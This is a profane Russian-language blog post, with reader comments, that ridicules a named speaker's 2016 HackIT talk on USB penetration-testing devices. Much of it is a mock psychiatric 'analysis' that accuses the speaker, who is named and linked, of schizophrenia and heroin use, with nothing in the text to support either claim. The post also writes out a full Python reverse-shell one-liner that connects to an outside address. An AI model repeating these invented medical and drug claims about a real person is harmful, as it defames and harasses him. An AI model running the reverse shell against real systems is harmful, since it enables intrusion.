ebanoe.devLite
0
legacy_l33t_-·3591 д назад·0 просмотров

Фанбой Mr.Robot'а на HackIT-2016: "Мои пруфы очень специфичны"

Дорогие ебаные читатели и ебанная Редакция, хочу поделиться своими впечатлениями от посещения конференции HackIT, проходившей недавно в Харькове, цена билета на которую колебалась от 200 до 1500 гривен. Идя на конференцию, где должны были выступать и соревноваться в CTF лучшие из лучших специалистов в Украине по информационной безопасности, меня не покидала мысль что эта конференция — очередная бессмысленная пафосная хуйня и бесполезная трата времени, в чем я и убедился позже.

Для того чтобы прояснить примерный уровень большинства выступающих, мною и опытным врачом-психотерапевтом был проанализирован доклад Алексея Мисника «HackIT-2016. USB устройства для пентеста.» Что из этого получилось читайте далее.

«Стартуем !» — именно этой фразой Алексей начинает свой охуитительный доклад. С первых минут видео можно оценить как превосходное ораторское искусство докладчика так и глубокий стиль изложения материала, восхитительную работу оператора также нельзя оставить без внимания, но вернемся к самому Алексею.

Алексей будучи фанатом сериала «Mr. Robot» взял лучшее от этого персонажа себе, а именно: шизофрению и любовь к тяжелым наркотикам, доказательством этого может служить несвязная речь, непредсказуемая смена настроения, тремор конечностей, при этом Алексей не забыл отбросить малозначительные качества: сообразительность, целеустремленность, выдающиеся навыки.

Со всем вышеперечисленным (наркотиками и шизофренией) Алексей решил выступить на конференции, поскольку речь Алексея может быть не понятна обычному человеку, с помощью психотерапевта давайте разберем бред больного. С полным 44-минутным видео вы можете ознакомится по ссылке внизу материала, а здесь нарезка самого «сока» выступления:

дисклеймер: видео может вызвать укачивание и тошноту, благодаря мастерской работе оператора — стабилизация изображения это для слабаков, давайте лучше пальцами напостой крутить zoom-in/zoom-out

Разбираем перлы:

-Все думают шо есть вот mass storage, что-то можно с ним сделать — мы его видим, на самом деле вся уязвимость только в контроллере

Алексей бормочет что-то невнятное подменяя общепризнанные значения терминов своими вымыслами. По мнению врача это может быть вызвано продолжительным употреблением героина.

-Я просто проводил два года аудит в гос. структурах по безопасности — поэтому я все там знаю идеально

Делая отступления от темы доклада Алексей, как бывалый специалист не забывает и повыебываться своими «достижениями».

-Там MS08 подходил к любому компу просто

Больной впадая в бессознательное состояние продолжает нести несвязный бред, на этот раз причиной приступа служит код «MS08». «Что же такое MS08?» этот вопрос возникает в голове у неподготовленного зрителя, опытный врач подсказывает что скорее всего речь идет об уязвимости MS08_067 в системах Windows, эксплуатируя которую можно получить полный доступ к уязвимой системе. Приступ заканчивается и Алексей продолжает.

-Он ничем себя не выдаст, вы просто приходите его снимаете, забираете, считываете то шо вам надо

этой фразой Алексей описал все тонкости работы с аппаратным кейлоггером на основе USB, после этого врач сделал неутешительный вывод: пациент — мамкин кулхацкер, занимающийся суходрочкой и запускающий эксплойты в многострадальный localhost.

-Я проводил как-то аудит, мы смогли взломать одну из машин сотрудника

Алексей признает раздвоения личности, при лечении шизофрении это очень важно. Алексей помнит что начинал аудит он один «Я проводил как-то аудит», но за тем личность раздваивается «мы смогли взломать одну из машин сотрудника». Врач рекоменует пациенту во избежания обострений не проводить больше аудиты. И вообще уйти нахуй со сцены.

-Я тоже юзер MacBook, кке, мака

Алексей периодически делает отступления чтобы повыебываться. На этот раз причиной выебонов стал MacBook которым владеет пациент.

-Я сидел в военном институте мы ломали WI-FI соседнего дома

Как настоящий мамкин хакер Алексей не забывает упомянуть о криминальном прошлом. Проникновение в домашнюю сеть граждан Украины используя программно-технические средства и нарушение 361 статьи криминального кодекса Украины по мнению Алексея — достижение о котором стоит рассказать в своем докладе. Сказочный долбоеб — резюмирует психотерапевт.

-Да я выпускник военного института просто, поэтому что бы вы знали, если Вам надо то можно брутить с соседнего дома WI-FI

Этой фразой Алексей призывает слушателей нарушать закон Украины «Если надо — то можно». Если надо денег — отожми денег, если надо подарить девушки сережки — сорви их с прохожей старушки. Для завершения образа Алексею не хватает только куполов на спине и золотого зуба.

-То что залоченная винда или мак выдают NTLM хеш при подключении USB устройства, есть при чем официальная статья как это сделать и мы это сделали!

Невероятно, аплодисменты, сделать что-то шаг за шагом имея инструкцию невообразимо сложно, восхитительно !
«К чему вообще этот доклад ?», «Где оригинальный контент ?», «Что этот уебан тут делает ?» — Именно эти вопросы задает большинство специалистов в области информационной безопасности слушая Алексея.

-А от Mac OS, в чем сама уязвимость атаки ?

«Уязвимость атаки» — таким беспощадным для сознания здравомыслящего человека оборотом Алексей пытается выбить врача из игры, но врач смахнув пот со лба, продолжает анализировать состояния больного дальше.

-Ну был там как-то CTF c SQLIte, база данных, cкуля, но ничего более, яж не пишу под мобильные

Что это вообще за нахуй ? Схуяли платить 1500 грн за вход на конференцию где говорят «скуля» вместо SQL-injection ? Все больше вопросов остается без ответа.

-Ну это так для затравки, вторая часть будет намного круче

Да, да внимательно Вас слушаем, продолжайте. «Пора вызывать санитаров и срочно госпитализировать больного» — шепотом добавляет психотерапевт.

-Я сделал очень быстро и с первого раза

Алексей прибегает к излюбленной стратегии — отступление для выебонов.

На этом этапе больше половины доклада позади, но в чем смысл доклада и где оригинальный контент не понятно.

-Заливая вместе с прошивкой получаете уязвимую флешку

Алексей снова бормочет что-то невнятное употребляя половину слов не к месту и скорее всего сам не понимает о чем рассказывает, надеясь на лучшее врач рекомендует увеличить дозы назначенных Алексею препаратов.

-Он не пройдет на большинстве систем потому что строчка /bin/bash шоб дать shell нам на удаленном компьютере он не всегда входит в стандартный пакет и чтобы он заработал его нужно подключить ситуация меняеться время от времени так шо надо тестировать на разных системах, я тестировал на Ubuntu 14.04 и без подкачки дополнений вот этот -e /bin/bash shell у меня не получился

Ну что же, для того чтобы понять насколько Алексей хороший специалист врач решает разобрать эту реплику полностью. В nc флаг -e нужен для того чтобы перенаправить STDOUT в STDIN программы обозначенной данным флагом, в современных Linux дистрибутивах утилита nc не поддерживает этот флаг. В данном случае Алексей надеться сделать reverse shell и вместо того чтобы добавить в доклад хоть немного оригинального контента он доставляет на машину, которую будет атаковать, пакеты которых в реальной жизни там не будет. Может проще сразу поставить rootkit ? Есть масса других способов сделать reverse shell, например использывать интерпретаторы python и perl которые есть в каждом современном Linux дистрибутиве, например: python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((«8.8.8.8», 666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([«/bin/sh»,»-i»]);’. Не понимая почему Алексей решил заняться информационной безопасностью а не садоводчеством, врач продолжает слушать жалобы больного.

-Кто знает шо такое reverse shell ? Так ну процентов 30, окей

На этом моменте ситуация окончательно прояснилась, причина по которой Алексея не обоссали во время доклада проста, 70%+ сидящих в аудитории — мечтающие «вайтишники» накопив денег на доставке пиццы и раздаче листовок тут же решили их спустить на курсы от Пивоварова и билет на конференцию от маминых хакеров в надежде чему-то научиться и не повторить судьбу последнего.

-Я защищен Avast’ом вы все видите, security есть

«…но не в этом здании и не в моем докладе, а где-то, я хочу верить !» — забывает добавить Алексей.

-Вопрос: кто знает про атаку DNS туннелирование шо это такое ?

Про «атаку DNS туннелирования» не знает даже Иисус, Аллах и Будда вместе взятые. Эта атака существует только в героиновых грезах Алексея. «DNS Tunneling» — это не атака, а метод обхода механизмов защиты основанный на передачи данных используя DNS запросы, применяется в основном для эксфильтрации данных — поясняет врач.

-Мой доклад окончен, если есть вопросы — задавайте

После доклада Алексея у большинства людей был только один вопрос: «Кто блядь вернет время и деньги потраченные на эту хуйню ?».

Краткое резюме всего доклада: ничего вместо рассказа о поиске и использовании готовых решений, притом зачастую нет понимая как работают эти самые решения нет, и даже вместо того чтобы написать сотню строчек кода для автоматизации процесса подготовки флешки для таргетированной атаки и придать смысл своему докладу, Алексей продолжает радостно рапортовать о его детских экспериментах.

«Тяжелый случай, скорее всего не излечим.» — говорит доктор после знакомства с пациентом. С чем сложно не согласиться. Но когда с Алексеем все стало ясно, появились другие вопросы связанные с организацией и качеством конференций по информационной безопасности в Украине. А это уже совсем другая история…

Ссылки.
1. Полное видео доклада (44 минуты): https://www.youtube.com/watch?v=72xFaXDXAok
2. Слайды: http://www.slideshare.net/HackIT-ukraine/usb-66977209
3. LinkedIn: https://www.linkedin.com/in/oleksii-misnik-08158255
4. HackIt http://2016.hackit-ukraine.com/rus

Из архива ebanoe · Опубликовано November 30, 2016

Комментарии (27)

  • legacy_Алиса3591 д назад

    второй нах!

    докладчик мудак, типовый ит-шник

    0
    Ответить
    • legacy_Парвиз3591 д назад

      Дядя, дай макбук.

    • legacy_Макс_Ёёменко3591 д назад

      Зайди ко мне в кабинет немедленно. Ha-ha-ha-ha!

  • legacy_Пеппа3591 д назад

    Как же дохуя текста
    КР СТ ТЛ (краткость сестра таланта)

    0
    Ответить
    • legacy_Пиздабон_13591 д назад

      И Н со своими сокращениями, кусок дерьма с дислексией.

  • legacy_Капитан_Очевидность3591 д назад

    4:44 Пацанчик в толчок просто хочет, ходит по аудитории, места себе не находит, предлагает устроить перерыв, а его никто не поддержал 🙂

  • legacy_JohnnyBeGood3591 д назад

    О BuildStuff конференции никто не напишет?

    0
    Ответить
    • legacy_Ходил_на_BuildStuff3591 д назад

      Я напишу. Ходил на BuildStuff. вырванные 2 дня из моей жизни, хорошо хоть что не из своего кармана платил. Новых знаний получил 0!

      0
      Ответить
      • legacy_JohnnyBeGood3591 д назад

        Согласен. Хоть там было несколько интересных докладов, — не пойду в следующий раз.

  • legacy_Туалетная_бумага3591 д назад

    Я вот сижу тут такой скромный с зп 800 бачей. И вижу приходят «мидлы c 10 лет опытом» на интревью который на просьбу «Раскажите что такое пост и гет запросы и разницу между ними» отвечают «это глобальные масивы в PHP» и не скромно озвучивая свои ожидания «две тисячи долларов налом», и у меня возникает риторический вопрос. ВЫ ЧЕ БЛЯ ПАЦАНЫ АХУЕЛИ?

    0
    Ответить
    • legacy_17_летний_сеньор3591 д назад

      Потому что можем и будем.
      А ты не завидуй, неудачник.

    • legacy_CSS-Architect3591 д назад

      А че ж ты сам двушку не получаешь? Может потому что сам тупой? Или перед менеджером язык в жопу залазит?

  • legacy_Ахуевающий3591 д назад

    Пиздец.
    Как то я пару лет назад то же хотел вкатиться в ITsec, но как то не пошло. А тут реальный фанбой робота рассказывает такое, что даже я, со своим недосамообучением кулхакинга понимаю какая же это чушь. Блять, а ведь думал посетить какую то конфу безопасников. Ебал я нахуй это дерьмо.

    отменить ответ
  • legacy_дядько_ЁСЫПЪ3591 д назад

    да бля, чьо ви доїблись, марнотратщікі хуєві: дакладчік розпереживався і ліпе єрунду всяку підряд. в мене є знакомий такий як він точь-в-точь, навіть виглядом його нагадує. а Льоха з кимось на пиві вєрняк ліпше би говорив, і жаждущім знаній «собутильнікам» було б інтірєсно ілі послухати його ілі обмінятися досвідом. ше раз, карочє гаваря, впізду всі піздоканфєрєнциї і піздодаклади. читайте книги/форуми/блоги

  • legacy_vitaliy173591 д назад

    Бляяаааааа… За выслушивание этого еще и деньги хотят ???

  • legacy_Не_быть_БЫДЛОМ3591 д назад

    Блядь, я даже знаю где именно это говно училось, в ІССЗІ НТУУ КПІ тем более, даже знаю где жило. А жило в говно казарме, страдало пожызненной хуйней, а потому то и пиздило интернет с соседних домов потому что говно нехотело зарабатывать денег, а клянчил их у мамки и хуярил траву в параше пока никто не видит. Мало того что в этом институте кроме ебаного мозгоправства и военщины нехуя толком нету…. от тудого ВСЕ валят как с ЖОПЫ МИРА, ТАК НЕТ, ЭТО это ебаное чмо своим ущербным и уставшым от выебничества мозгом, и пиздой под носом, пиздило «интернет» у жытелей. Могу сказать единственно в защиту далбоеба что в этом ебаном «институте связи» что на печерске (кст.) У МНОГИХ ГОЛОВА БОЛЬНА ОТ БЕСКОНЕЧНОГО ВЫЕБНИЧЕСТВА ЧТО ОНИ СБУшники итд. Так что прописываем больному: смуззи, стартапы и всего этого много-много шоб прорыгался сука просрался подавился всем этим, а потом надеемся что выздоровеет.
    —————
    Сука просто задело до боли…

    0
    Ответить
    • legacy_и_твою_маму_тоже3591 д назад

      >>ІССЗІ НТУУ КПІ

      шо-шо?

      0
      Ответить
      • legacy_ненавижу_пиздаболов3591 д назад

        А что, коммент выше трушный или ты не согласен?!
        Я поддерживаю!!!!!!! +10000

  • legacy_Программист_погорелого_театра3591 д назад

    После этого видоса этот гусь получает навес — Масторыч.

  • legacy_goto3591 д назад

    Шапки-петушка не хватает

  • legacy_xyi_13591 д назад

    Пизда. Хули еще один дурачек))) таких на конфах дохуя, бо норм человек лучше бабу потянет чем пойдет пиздеть на конфу.

  • legacy_Парвиз3591 д назад

    сука ОТДАЙ МОЙ МАКБУК!!! ты все равно блядь пользоваться им не умеешь!

  • legacy_Высерок3591 д назад

    Короче почитал я статью и понял , что в первую очередь — я долбаеб, ибо я нихуя не шарю в этой вашей безопасности, если тут собрались такие кенты которые легко видят поебень в докладе этого опущенца , скажите че такое почитать интересное? Желательно на буржуйском языке (т.е. на англ, а то буржуй эт от слова Буржуа, что в общем-то францэ) .

    PS. Даже без знания того о чем тип пиздит его хуевийшая дикция, несобранность и неспособность составлять слова последовательно вызывает сомнения в его квалификации. И вот эта хуйня с «ШО» я сам говорю как хуйло неграмотное но ты ж, блять, на публике, контролируй себя, нахуя этот суржик.

    0
    Ответить
    • legacy_JohnnyBeGood3591 д назад

      хаха. Поддерживаю

  • legacy_Я_люблю_программировать3591 д назад

    статья — высер, как и 99% на ебаном

    0
    Ответить
    • legacy_PbI6A3591 д назад

      твой высер очень важен для нас, спасибо что потратил время и поделился

  • legacy_Парвиз3591 д назад

    Речь любого из Ит-шников — высер на 99%. Мне противно слушать почти каждый из докладов на таких конференциях по той причине, что почти каждый докладчик не владеет ни одним из так называемых по-пацански «софт скилов», а на нормальном языке «навыков общения». Сука, хочется взять и уебать каждому, кто в чат пишет на ломаном рунглише, а потом и в каждом разговоре повсеместно вставляет эти buzzwords, базворды. У меня из ушей кровь течёт от такого